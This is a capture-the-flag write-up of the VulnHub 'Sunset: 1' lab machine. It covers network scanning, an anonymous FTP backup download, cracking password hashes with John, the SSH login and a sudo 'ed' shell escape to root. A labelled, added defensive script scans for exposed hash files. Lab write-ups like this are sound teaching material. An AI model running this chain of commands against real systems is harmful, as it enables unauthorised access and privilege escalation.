VulnHub - Sunset: 1

hAck3rio
Jun 4, 2021

Hello friends, this writeup covers the VulnHub Sunset: 1 machine. It was a very nice box and I enjoyed it a lot. Let’s jump right in!

Network Scanning

In the first step of scanning I used the “arp-scan -l” command to perform a Local Network Scan to find out the IP address of the targeted machine.

Command : arp-scan -l

After getting the target machine’s IP address, I scanned the target for open ports using Nmap.

Command : nmap -A -T4 -p- -oN nmap 192.168.0.175

Starting Nmap 7.80 ( https://nmap.org ) at 2021-06-04 22:59 IST
Nmap scan report for 192.168.0.175
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp pyftpdlib 1.5.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 root root 1062 Jul 29 2019 backup
| ftp-syst:
| STAT:
| FTP server status:
| Connected to: 192.168.0.175:21
| Waiting for username.
| TYPE: ASCII; STRUcture: File; MODE: Stream
| Data connection closed.
|_End of status.
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 71:bd:fa:c5:8c:88:7c:22:14:c4:20:03:32:36:05:d6 (RSA)
| 256 35:92:8e:16:43:0c:39:88:8e:83:0d:e2:2c:a4:65:91 (ECDSA)
|_ 256 45:c5:40:14:49:cf:80:3c:41:4f:bb:22:6c:80:1e:fe (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.53 seconds

From the scan result I found that FTP port 21 is open with anonymous login enabled.

Enumeration / Reconnaissance

Let’s log in with username : anonymous and any random password

Command : ftp 192.168.0.175

Here I found one backup file.

I transferred the backup file to my machine

Command : get backup

Now the backup file is transferred to my machine.

Password Cracking

The file contains SHA512 ($6$) hashes, so we can crack them using John the Ripper.

Command : john --wordlist=/usr/share/wordlists/rockyou.txt backup --format=sha512crypt

Here I found the credentials : Username = sunset , Password : cheer14
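
From the defender's side, the root cause of this step is a file holding crypt(3) password hashes in a directory served over anonymous FTP. The following added example (not part of the original writeup) scans a directory tree for shadow-style `user:$id$salt$hash` entries and reports only the user and scheme; the entry layout, function names and sample data are assumptions constructed for illustration.

```python
import os
import re
import sys

# crypt(3) scheme ids as they appear in the password field of shadow-style files
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt",
           "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt", "y": "yescrypt"}

# user:$id$[params$]salt$hash, optionally followed by more ':'-separated fields
ENTRY = re.compile(
    r"^(?P<user>[A-Za-z_][\w.-]*):"
    r"\$(?P<id>[0-9a-z]{1,2})\$"
    r"(?:[./A-Za-z0-9=]+\$){1,3}[./A-Za-z0-9]{20,}(?::|$)"
)
MAX_BYTES = 1_000_000  # skip large files; shadow backups are small

# Constructed sample: the salt and hash are filler, not real credentials
SAMPLE = "\n".join([
    "CREDENTIALS:",
    "office:$6$constructedsalt$" + "A" * 86,
    "daemon:*:18000:0:99999:7:::",
    "notes: rotate passwords quarterly",
])

def find_password_hashes(text):
    """Return (line_no, user, scheme) per shadow-style entry; never the hash itself."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = ENTRY.match(line.strip())
        if m:
            hits.append((n, m["user"], SCHEMES.get(m["id"], "unknown")))
    return hits

def audit_tree(root):
    """Scan every regular file under root (e.g. the FTP root) for such entries."""
    findings = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    hits = find_password_hashes(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings

if __name__ == "__main__":
    for path, hits in audit_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for line_no, user, scheme in hits:
            print(f"{path}:{line_no}: {scheme} hash for user {user!r}")
```

Run it against the directory the FTP service exports; any hit means a password-hash file is readable by every anonymous client.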

As SSH port 22 was open, I used these credentials to log in.

Command : ssh sunset@192.168.0.175

Wow!! Now I have a remote shell on the target box.

Now I am the sunset user.

Command : ls

Privilege Escalation

Next I ran “sudo -l”, which lists the commands we can execute with sudo.

Command : sudo -l

Here I found the binary “/usr/bin/ed”.

Then I searched for ed privilege escalation and found one article.

https://www.hackingarticles.in/linux-for-pentester-ed-privilege-escalation/

Then I searched for ed on GTFOBins and found the exploit there.

https://gtfobins.github.io/gtfobins/ed/

So I executed the “!/bin/bash” command and got root 🙂

Thanks

Happy hacking 🙂
